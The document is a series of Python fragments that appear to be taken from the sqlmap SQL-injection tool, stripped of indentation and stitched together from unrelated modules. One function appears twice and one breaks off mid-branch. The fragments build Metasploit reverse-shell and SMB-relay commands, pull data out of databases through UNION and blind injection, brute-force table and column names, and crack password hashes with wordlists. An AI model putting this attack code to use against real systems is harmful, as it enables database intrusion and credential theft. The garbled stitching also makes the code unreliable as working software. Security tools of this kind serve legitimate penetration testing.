def _selectLhost(self):
if self.connectionStr.startswith("reverse"):
message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP
address = readInput(message, default=self.localIP)
if not address:
address = self.localIP
return address
elif self.connectionStr.startswith("bind"):
return None
else:
raise SqlmapDataException("unexpected connection type")
def _selectRhost(self):
if self.connectionStr.startswith("bind"):
message = "what is the back-end DBMS address? [%s] " % self.remoteIP
address = readInput(message, default=self.remoteIP)
if not address:
address = self.remoteIP
return address
elif self.connectionStr.startswith("reverse"):
return None
else:
raise SqlmapDataException("unexpected connection type")
def _get_cursor(self):
threadData = getCurrentThreadData()
if threadData.hashDBCursor is None:
try:
connection = sqlite3.connect(self.filepath,
timeout=3,
isolation_level=None)
threadData.hashDBCursor = connection.cursor()
threadData.hashDBCursor.execute(
"CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)"
)
except Exception, ex:
errMsg = "error occurred while opening a session "
errMsg += "file '%s' ('%s')" % (self.filepath, ex)
raise SqlmapDataException(errMsg)
def _forgeMsfCliCmd(self, exitfunc="process"):
self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self._cliCmd += " EXITFUNC=%s" % exitfunc
self._cliCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("bind"):
self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += " LHOST=%s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
self._cliCmd += " DisableCourtesyShell=true"
self._cliCmd += " E"
def _forgeMsfCliCmdForSmbrelay(self):
self._prepareIngredients(encode=False)
self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
self._cliCmd += " EXITFUNC=thread"
self._cliCmd += " LPORT=%s" % self.portStr
self._cliCmd += " SRVHOST=%s" % self.lhostStr
self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
if self.connectionStr.startswith("bind"):
self._cliCmd += " RHOST=%s" % self.rhostStr
elif self.connectionStr.startswith("reverse"):
self._cliCmd += " LHOST=%s" % self.lhostStr
else:
raise SqlmapDataException("unexpected connection type")
self._cliCmd += " E"
def adjust(self):
self.closeFP()
if self.index > len(self.filenames):
raise StopIteration
elif self.index == len(self.filenames):
self.iter = iter(self.custom)
else:
current = self.filenames[self.index]
if os.path.splitext(current)[1].lower() == ".zip":
_ = zipfile.ZipFile(current, 'r')
if len(_.namelist()) == 0:
errMsg = "no file(s) inside '%s'" % current
raise SqlmapDataException(errMsg)
self.fp = _.open(_.namelist()[0])
else:
self.fp = open(current, 'r')
self.iter = iter(self.fp)
self.index += 1
def http_request(self, request):
data = request.data
if isinstance(data, dict):
v_files = []
v_vars = []
try:
for (key, value) in data.items():
if hasattr(value, "fileno") or hasattr(
value, "file") or isinstance(value, io.IOBase):
v_files.append((key, value))
else:
v_vars.append((key, value))
except TypeError:
systype, value, traceback = sys.exc_info()
raise SqlmapDataException(
"not a valid non-string sequence or mapping object '%s'" %
traceback)
if len(v_files) == 0:
data = _urllib.parse.urlencode(v_vars, doseq)
else:
boundary, data = self.multipart_encode(v_vars, v_files)
contenttype = "multipart/form-data; boundary=%s" % boundary
#if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0):
# print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data")
request.add_unredirected_header("Content-Type", contenttype)
request.data = data
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235
if request.data:
for match in re.finditer(
b"(?i)\\s*-{20,}\\w+(\\s+Content-Disposition[^\\n]+\\s+|\\-\\-\\s*)",
request.data):
part = match.group(0)
if b'\r' not in part:
request.data = request.data.replace(
part, part.replace(b'\n', b"\r\n"))
return request
def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr)
self._payloadCmd += " EXITFUNC=%s" % exitfunc
self._payloadCmd += " LPORT=%s" % self.portStr
if self.connectionStr.startswith("reverse"):
self._payloadCmd += " LHOST=%s" % self.lhostStr
elif not self.connectionStr.startswith("bind"):
raise SqlmapDataException("unexpected connection type")
if Backend.isOs(OS.LINUX) and conf.privEsc:
self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
if extra == "BufferRegister=EAX":
self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
if extra is not None:
self._payloadCmd += " %s" % extra
else:
self._payloadCmd += " X > \"%s\"" % outFile
def adjust(self):
self.closeFP()
if self.index > len(self.filenames):
raise StopIteration
elif self.index == len(self.filenames):
self.iter = iter(self.custom)
else:
self.current = self.filenames[self.index]
if os.path.splitext(self.current)[1].lower() == ".zip":
try:
_ = zipfile.ZipFile(self.current, 'r')
except zipfile.error, ex:
errMsg = "something appears to be wrong with "
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
if len(_.namelist()) == 0:
errMsg = "no file(s) inside '%s'" % self.current
raise SqlmapDataException(errMsg)
self.fp = _.open(_.namelist()[0])
else:
def unionUse(expression, unpack=True, dump=False):
"""
This function tests for an UNION SQL injection on the target
URL then call its subsidiary function to effectively perform an
UNION SQL injection on the affected URL
"""
initTechnique(PAYLOAD.TECHNIQUE.UNION)
abortedFlag = False
count = None
origExpr = expression
startLimit = 0
stopLimit = None
value = None
width = getConsoleWidth()
start = time.time()
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(
origExpr)
# Set kb.partRun in case the engine is called from the API
kb.partRun = getPartRun(alias=False) if conf.api else None
if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns:
kb.rowXmlMode = True
_ = "(%s FOR XML RAW, BINARY BASE64)" % expression
output = _oneShotUnionUse(_, False)
value = parseUnionPage(output)
kb.rowXmlMode = False
if expressionFieldsList and len(
expressionFieldsList) > 1 and "ORDER BY" in expression.upper():
# Removed ORDER BY clause because UNION does not play well with it
expression = re.sub(r"(?i)\s*ORDER BY\s+[\w,]+", "", expression)
debugMsg = "stripping ORDER BY clause from statement because "
debugMsg += "it does not play well with UNION query SQL injection"
singleTimeDebugMessage(debugMsg)
# We have to check if the SQL query might return multiple entries
# if the technique is partial UNION query and in such case forge the
# SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
if value is None and (
kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where
== PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or
(dump and (conf.limitStart or conf.limitStop)) or "LIMIT "
in expression.upper()) and " FROM " in expression.upper() and (
(Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or
(Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE
and not expression.upper().endswith(
FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))
) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(
expression, dump)
if limitCond:
# Count the number of SQL query entries output
countedExpression = expression.replace(
expressionFields,
queries[Backend.getIdentifiedDbms()].count.query %
('*' if len(expressionFieldsList) > 1 else expressionFields),
1)
if " ORDER BY " in countedExpression.upper():
_ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_]
output = _oneShotUnionUse(countedExpression, unpack)
count = unArrayizeValue(parseUnionPage(output))
if isNumPosStrValue(count):
if isinstance(stopLimit, int) and stopLimit > 0:
stopLimit = min(int(count), int(stopLimit))
else:
stopLimit = int(count)
infoMsg = "used SQL query returns "
infoMsg += "%d entries" % stopLimit
logger.info(infoMsg)
elif count and (not isinstance(count, basestring)
or not count.isdigit()):
warnMsg = "it was not possible to count the number "
warnMsg += "of entries for the SQL query provided. "
warnMsg += "sqlmap will assume that it returns only "
warnMsg += "one entry"
logger.warn(warnMsg)
stopLimit = 1
elif (not count or int(count) == 0):
if not count:
warnMsg = "the SQL query provided does not "
warnMsg += "return any output"
logger.warn(warnMsg)
else:
value = [] # for empty tables
return value
if isNumPosStrValue(count) and int(count) > 1:
threadData = getCurrentThreadData()
try:
threadData.shared.limits = iter(
xrange(startLimit, stopLimit))
except OverflowError:
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (
startLimit, stopLimit)
errMsg += "with switch '--fresh-queries'"
raise SqlmapDataException(errMsg)
numThreads = min(conf.threads, (stopLimit - startLimit))
threadData.shared.value = BigArray()
threadData.shared.buffered = []
threadData.shared.counter = 0
threadData.shared.lastFlushed = startLimit - 1
threadData.shared.showEta = conf.eta and (stopLimit -
startLimit) > 1
if threadData.shared.showEta:
threadData.shared.progress = ProgressBar(
maxValue=(stopLimit - startLimit))
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
kb.suppressResumeInfo = True
debugMsg = "suppressing possible resume console info because of "
debugMsg += "large number of rows. It might take too long"
logger.debug(debugMsg)
try:
def unionThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
with kb.locks.limit:
try:
valueStart = time.time()
threadData.shared.counter += 1
num = threadData.shared.limits.next()
except StopIteration:
break
if Backend.getIdentifiedDbms() in (DBMS.MSSQL,
DBMS.SYBASE):
field = expressionFieldsList[0]
elif Backend.isDbms(DBMS.ORACLE):
field = expressionFieldsList
else:
field = None
limitedExpr = agent.limitQuery(
num, expression, field)
output = _oneShotUnionUse(limitedExpr, unpack,
True)
if not kb.threadContinue:
break
if output:
with kb.locks.value:
if all(_ in output
for _ in (kb.chars.start,
kb.chars.stop)):
items = parseUnionPage(output)
if threadData.shared.showEta:
threadData.shared.progress.progress(
threadData.shared.counter)
if isListLike(items):
# in case that we requested N columns and we get M!=N then we have to filter a bit
if len(items) > 1 and len(
expressionFieldsList) > 1:
items = [
item for item in items
if isListLike(item)
and len(item) == len(
expressionFieldsList)
]
items = [
_ for _ in flattenValue(items)
]
if len(items) > len(
expressionFieldsList):
filtered = OrderedDict()
for item in items:
key = re.sub(
r"[^A-Za-z0-9]", "",
item).lower()
if key not in filtered or re.search(
r"[^A-Za-z0-9]",
item):
filtered[key] = item
items = filtered.values()
items = [items]
index = None
for index in xrange(1 + len(
threadData.shared.buffered)):
if index < len(
threadData.shared.buffered
) and threadData.shared.buffered[
index][0] >= num:
break
threadData.shared.buffered.insert(
index or 0, (num, items))
else:
index = None
if threadData.shared.showEta:
threadData.shared.progress.progress(
threadData.shared.counter)
for index in xrange(1 + len(
threadData.shared.buffered)):
if index < len(
threadData.shared.buffered
) and threadData.shared.buffered[
index][0] >= num:
break
threadData.shared.buffered.insert(
index or 0, (num, None))
items = output.replace(
kb.chars.start, "").replace(
kb.chars.stop,
"").split(kb.chars.delimiter)
while threadData.shared.buffered and (
threadData.shared.lastFlushed + 1
>= threadData.shared.buffered[0][0]
or
len(threadData.shared.buffered) >
MAX_BUFFERED_PARTIAL_UNION_LENGTH):
threadData.shared.lastFlushed, _ = threadData.shared.buffered[
0]
if not isNoneValue(_):
threadData.shared.value.extend(
arrayizeValue(_))
del threadData.shared.buffered[0]
if conf.verbose == 1 and not (
threadData.resumed
and kb.suppressResumeInfo
) and not threadData.shared.showEta:
_ = ','.join(
"\"%s\"" % _ for _ in
flattenValue(arrayizeValue(
items))) if not isinstance(
items, basestring) else items
status = "[%s] [INFO] %s: %s" % (
time.strftime("%X"), "resumed"
if threadData.resumed else "retrieved",
_ if kb.safeCharEncode else
safecharencode(_))
if len(status) > width:
status = "%s..." % status[:width - 3]
dataToStdout("%s\n" % status)
runThreads(numThreads, unionThread)
if conf.verbose == 1:
clearConsoleLine(True)
except KeyboardInterrupt:
abortedFlag = True
warnMsg = "user aborted during enumeration. sqlmap "
warnMsg += "will display partial output"
logger.warn(warnMsg)
finally:
for _ in sorted(threadData.shared.buffered):
if not isNoneValue(_[1]):
threadData.shared.value.extend(arrayizeValue(_[1]))
value = threadData.shared.value
kb.suppressResumeInfo = False
if not value and not abortedFlag:
output = _oneShotUnionUse(expression, unpack)
value = parseUnionPage(output)
duration = calculateDeltaSeconds(start)
if not kb.bruteMode:
debugMsg = "performed %d queries in %.2f seconds" % (
kb.counters[PAYLOAD.TECHNIQUE.UNION], duration)
logger.debug(debugMsg)
return value
def tableExists(tableFile, regex=None):
if kb.tableExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:
warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])
warnMsg += "for common table existence check"
logger.warn(warnMsg)
message = "are you sure you want to continue? [y/N] "
kb.tableExistsChoice = readInput(message, default='N', boolean=True)
if not kb.tableExistsChoice:
return None
result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr())))
if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.db = conf.db.upper()
if result:
errMsg = "can't use table existence check because of detected invalid results "
errMsg += "(most likely caused by inability of the used injection "
errMsg += "to distinguish erroneous results)"
raise SqlmapDataException(errMsg)
message = "which common tables (wordlist) file do you want to use?\n"
message += "[1] default '%s' (press Enter)\n" % tableFile
message += "[2] custom"
choice = readInput(message, default='1')
if choice == '2':
message = "what's the custom common tables file location?\n"
tableFile = readInput(message) or tableFile
infoMsg = "checking table existence using items from '%s'" % tableFile
logger.info(infoMsg)
tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True)
tables.extend(_addPageTextWords())
tables = filterListValue(tables, regex)
threadData = getCurrentThreadData()
threadData.shared.count = 0
threadData.shared.limit = len(tables)
threadData.shared.value = []
threadData.shared.unique = set()
def tableExistsThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
kb.locks.count.acquire()
if threadData.shared.count < threadData.shared.limit:
table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True)
threadData.shared.count += 1
kb.locks.count.release()
else:
kb.locks.count.release()
break
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
fullTableName = "%s.%s" % (conf.db, table)
else:
fullTableName = table
result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName)))
kb.locks.io.acquire()
if result and table.lower() not in threadData.shared.unique:
threadData.shared.value.append(table)
threadData.shared.unique.add(table.lower())
if conf.verbose in (1, 2) and not conf.api:
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
dataToStdout(infoMsg, True)
if conf.verbose in (1, 2):
status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
kb.locks.io.release()
try:
runThreads(conf.threads, tableExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = "user aborted during table existence "
warnMsg += "check. sqlmap will display partial output"
logger.warn(warnMsg)
clearConsoleLine(True)
dataToStdout("\n")
if not threadData.shared.value:
warnMsg = "no table(s) found"
logger.warn(warnMsg)
else:
for item in threadData.shared.value:
if conf.db not in kb.data.cachedTables:
kb.data.cachedTables[conf.db] = [item]
else:
kb.data.cachedTables[conf.db].append(item)
for _ in ((conf.db, item) for item in threadData.shared.value):
if _ not in kb.brute.tables:
kb.brute.tables.append(_)
hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True)
return kb.data.cachedTables
def columnExists(columnFile, regex=None):
if kb.columnExistsChoice is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct:
warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED])
warnMsg += "for common column existence check"
logger.warn(warnMsg)
message = "are you sure you want to continue? [y/N] "
kb.columnExistsChoice = readInput(message, default='N', boolean=True)
if not kb.columnExistsChoice:
return None
if not conf.tbl:
errMsg = "missing table parameter"
raise SqlmapMissingMandatoryOptionException(errMsg)
if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.db = conf.db.upper()
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr())))
if result:
errMsg = "can't use column existence check because of detected invalid results "
errMsg += "(most likely caused by inability of the used injection "
errMsg += "to distinguish erroneous results)"
raise SqlmapDataException(errMsg)
message = "which common columns (wordlist) file do you want to use?\n"
message += "[1] default '%s' (press Enter)\n" % columnFile
message += "[2] custom"
choice = readInput(message, default='1')
if choice == '2':
message = "what's the custom common columns file location?\n"
columnFile = readInput(message) or columnFile
infoMsg = "checking column existence using items from '%s'" % columnFile
logger.info(infoMsg)
columns = getFileItems(columnFile, unique=True)
columns.extend(_addPageTextWords())
columns = filterListValue(columns, regex)
table = safeSQLIdentificatorNaming(conf.tbl, True)
if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table)
kb.threadContinue = True
kb.bruteMode = True
threadData = getCurrentThreadData()
threadData.shared.count = 0
threadData.shared.limit = len(columns)
threadData.shared.value = []
def columnExistsThread():
threadData = getCurrentThreadData()
while kb.threadContinue:
kb.locks.count.acquire()
if threadData.shared.count < threadData.shared.limit:
column = safeSQLIdentificatorNaming(columns[threadData.shared.count])
threadData.shared.count += 1
kb.locks.count.release()
else:
kb.locks.count.release()
break
result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table)))
kb.locks.io.acquire()
if result:
threadData.shared.value.append(column)
if conf.verbose in (1, 2) and not conf.api:
clearConsoleLine(True)
infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
dataToStdout(infoMsg, True)
if conf.verbose in (1, 2):
status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
kb.locks.io.release()
try:
runThreads(conf.threads, columnExistsThread, threadChoice=True)
except KeyboardInterrupt:
warnMsg = "user aborted during column existence "
warnMsg += "check. sqlmap will display partial output"
logger.warn(warnMsg)
clearConsoleLine(True)
dataToStdout("\n")
if not threadData.shared.value:
warnMsg = "no column(s) found"
logger.warn(warnMsg)
else:
columns = {}
for column in threadData.shared.value:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
result = not inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE %s REGEXP '[^0-9]')", (column, table, column)))
else:
result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
if result:
columns[column] = "numeric"
else:
columns[column] = "non-numeric"
kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
for _ in ((conf.db, conf.tbl, item[0], item[1]) for item in list(columns.items())):
if _ not in kb.brute.columns:
kb.brute.columns.append(_)
hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True)
return kb.data.cachedColumns
def dictionaryAttack(attack_dict):
suffix_list = [""]
custom_wordlist = [""]
hash_regexes = []
results = []
resumes = []
user_hash = []
processException = False
foundHash = False
for (_, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
regex = hashRecognition(hash_)
if regex and regex not in hash_regexes:
hash_regexes.append(regex)
infoMsg = "using hash method '%s'" % __functions__[
regex].func_name
logger.info(infoMsg)
for hash_regex in hash_regexes:
keys = set()
attack_info = []
for (user, hashes) in attack_dict.items():
for hash_ in hashes:
if not hash_:
continue
foundHash = True
hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_
if re.match(hash_regex, hash_):
try:
item = None
if hash_regex not in (
HASH.CRYPT_GENERIC, HASH.JOOMLA,
HASH.WORDPRESS, HASH.UNIX_MD5_CRYPT,
HASH.APACHE_MD5_CRYPT, HASH.APACHE_SHA1,
HASH.VBULLETIN, HASH.VBULLETIN_OLD, HASH.SSHA,
HASH.SSHA256, HASH.SSHA512, HASH.DJANGO_MD5,
HASH.DJANGO_SHA1, HASH.MD5_BASE64,
HASH.SHA1_BASE64, HASH.SHA256_BASE64,
HASH.SHA512_BASE64):
hash_ = hash_.lower()
if hash_regex in (HASH.MD5_BASE64, HASH.SHA1_BASE64,
HASH.SHA256_BASE64,
HASH.SHA512_BASE64):
item = [(user,
hash_.decode("base64").encode("hex")), {}]
elif hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD,
HASH.MD5_GENERIC,
HASH.SHA1_GENERIC,
HASH.APACHE_SHA1):
item = [(user, hash_), {}]
elif hash_regex in (HASH.SSHA, ):
item = [(user, hash_), {
"salt": hash_.decode("base64")[20:]
}]
elif hash_regex in (HASH.SSHA256, ):
item = [(user, hash_), {
"salt": hash_.decode("base64")[32:]
}]
elif hash_regex in (HASH.SSHA512, ):
item = [(user, hash_), {
"salt": hash_.decode("base64")[64:]
}]
elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES):
item = [(user, hash_), {'username': user}]
elif hash_regex in (HASH.ORACLE, ):
item = [(user, hash_), {"salt": hash_[-20:]}]
elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD,
HASH.MSSQL_NEW):
item = [(user, hash_), {"salt": hash_[6:14]}]
elif hash_regex in (HASH.CRYPT_GENERIC, ):
item = [(user, hash_), {"salt": hash_[0:2]}]
elif hash_regex in (HASH.UNIX_MD5_CRYPT,
HASH.APACHE_MD5_CRYPT):
item = [(user, hash_), {
"salt": hash_.split('$')[2],
"magic": "$%s$" % hash_.split('$')[1]
}]
elif hash_regex in (HASH.JOOMLA, HASH.VBULLETIN,
HASH.VBULLETIN_OLD):
item = [(user, hash_), {
"salt": hash_.split(':')[-1]
}]
elif hash_regex in (HASH.DJANGO_MD5, HASH.DJANGO_SHA1):
item = [(user, hash_), {
"salt": hash_.split('$')[1]
}]
elif hash_regex in (HASH.WORDPRESS, ):
if ITOA64.index(hash_[3]) < 32:
item = [(user, hash_), {
"salt": hash_[4:12],
"count": 1 << ITOA64.index(hash_[3]),
"prefix": hash_[:12]
}]
else:
warnMsg = "invalid hash '%s'" % hash_
logger.warn(warnMsg)
if item and hash_ not in keys:
resumed = hashDBRetrieve(hash_)
if not resumed:
attack_info.append(item)
user_hash.append(item[0])
else:
infoMsg = "resuming password '%s' for hash '%s'" % (
resumed, hash_)
if user and not user.startswith(
DUMMY_USER_PREFIX):
infoMsg += " for user '%s'" % user
logger.info(infoMsg)
resumes.append((user, hash_, resumed))
keys.add(hash_)
except (binascii.Error, IndexError):
pass
if not attack_info:
continue
if not kb.wordlists:
while not kb.wordlists:
# the slowest of all methods hence smaller default dict
if hash_regex in (HASH.ORACLE_OLD, ):
dictPaths = [paths.SMALL_DICT]
else:
dictPaths = [paths.WORDLIST]
message = "what dictionary do you want to use?\n"
message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[
0]
message += "[2] custom dictionary file\n"
message += "[3] file with list of dictionary files"
choice = readInput(message, default='1')
try:
if choice == '2':
message = "what's the custom dictionary's location?\n"
dictPath = readInput(message)
if dictPath:
dictPaths = [dictPath]
logger.info("using custom dictionary")
elif choice == '3':
message = "what's the list file location?\n"
listPath = readInput(message)
checkFile(listPath)
dictPaths = getFileItems(listPath)
logger.info("using custom list of dictionaries")
else:
logger.info("using default dictionary")
dictPaths = filter(None, dictPaths)
for dictPath in dictPaths:
checkFile(dictPath)
if os.path.splitext(dictPath)[1].lower() == ".zip":
_ = zipfile.ZipFile(dictPath, 'r')
if len(_.namelist()) == 0:
errMsg = "no file(s) inside '%s'" % dictPath
raise SqlmapDataException(errMsg)
else:
_.open(_.namelist()[0])
kb.wordlists = dictPaths
except Exception, ex:
warnMsg = "there was a problem while loading dictionaries"
warnMsg += " ('%s')" % getSafeExString(ex)
logger.critical(warnMsg)
message = "do you want to use common password suffixes? (slow!) [y/N] "
if readInput(message, default='N', boolean=True):
suffix_list += COMMON_PASSWORD_SUFFIXES
infoMsg = "starting dictionary-based cracking (%s)" % __functions__[
hash_regex].func_name
logger.info(infoMsg)
for item in attack_info:
((user, _), _) = item
if user and not user.startswith(DUMMY_USER_PREFIX):
custom_wordlist.append(normalizeUnicode(user))
# Algorithms without extra arguments (e.g. salt and/or username)
if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC,
HASH.SHA1_GENERIC, HASH.SHA224_GENERIC,
HASH.SHA256_GENERIC, HASH.SHA384_GENERIC,
HASH.SHA512_GENERIC, HASH.APACHE_SHA1,
HASH.VBULLETIN, HASH.VBULLETIN_OLD):
for suffix in suffix_list:
if not attack_info or processException:
break
if suffix:
clearConsoleLine()
infoMsg = "using suffix '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = "starting %d processes " % _multiprocessing.cpu_count(
)
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
count = _multiprocessing.Value(
'i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(
target=_bruteProcessVariantA,
args=(attack_info, hash_regex, suffix, retVal,
i, count, kb.wordlists, custom_wordlist,
conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
else:
warnMsg = "multiprocessing hash cracking is currently "
warnMsg += "not supported on this platform"
singleTimeWarnMessage(warnMsg)
retVal = Queue()
_bruteProcessVariantA(attack_info, hash_regex, suffix,
retVal, 0, 1, kb.wordlists,
custom_wordlist, conf.api)
except KeyboardInterrupt:
print
processException = True
warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(block=False)
attack_info = filter(
lambda _: _[0][0] != user or _[0][1] != hash_,
attack_info)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
else:
for ((user, hash_), kwargs) in attack_info:
if processException:
break
if any(_[0] == user and _[1] == hash_ for _ in results):
continue
count = 0
found = False
for suffix in suffix_list:
if found or processException:
break
if suffix:
clearConsoleLine()
infoMsg = "using suffix '%s'" % suffix
logger.info(infoMsg)
retVal = None
processes = []
try:
if _multiprocessing:
if _multiprocessing.cpu_count() > 1:
infoMsg = "starting %d processes " % _multiprocessing.cpu_count(
)
singleTimeLogMessage(infoMsg)
gc.disable()
retVal = _multiprocessing.Queue()
found_ = _multiprocessing.Value('i', False)
count = _multiprocessing.Value(
'i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()):
process = _multiprocessing.Process(
target=_bruteProcessVariantB,
args=(user, hash_, kwargs, hash_regex,
suffix, retVal, found_, i, count,
kb.wordlists, custom_wordlist,
conf.api))
processes.append(process)
for process in processes:
process.daemon = True
process.start()
while count.value > 0:
time.sleep(0.5)
found = found_.value != 0
else:
warnMsg = "multiprocessing hash cracking is currently "
warnMsg += "not supported on this platform"
singleTimeWarnMessage(warnMsg)
class Value():
pass
retVal = Queue()
found_ = Value()
found_.value = False
_bruteProcessVariantB(user, hash_, kwargs,
hash_regex, suffix, retVal,
found_, 0, 1, kb.wordlists,
custom_wordlist, conf.api)
found = found_.value
except KeyboardInterrupt:
print
processException = True
warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)"
logger.warn(warnMsg)
for process in processes:
try:
process.terminate()
process.join()
except (OSError, AttributeError):
pass
finally:
if _multiprocessing:
gc.enable()
if retVal:
conf.hashDB.beginTransaction()
while not retVal.empty():
user, hash_, word = item = retVal.get(
block=False)
hashDBWrite(hash_, word)
results.append(item)
conf.hashDB.endTransaction()
clearConsoleLine()
def _goInferenceProxy(expression,
fromUser=False,
batch=False,
unpack=True,
charsetType=None,
firstChar=None,
lastChar=None,
dump=False):
"""
Retrieve the output of a SQL query characted by character taking
advantage of an blind SQL injection vulnerability on the affected
parameter through a bisection algorithm.
"""
initTechnique(getTechnique())
query = agent.prefixQuery(getTechniqueData().vector)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
count = None
startLimit = 0
stopLimit = None
outputs = BigArray()
if not unpack:
return _goInference(payload, expression, charsetType, firstChar,
lastChar, dump)
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(
expression)
rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD):
expressionFieldsList = [expressionFields]
if len(expressionFieldsList) > 1:
infoMsg = "the SQL query provided has more than one field. "
infoMsg += "sqlmap will now unpack it into distinct queries "
infoMsg += "to be able to retrieve the output even if we "
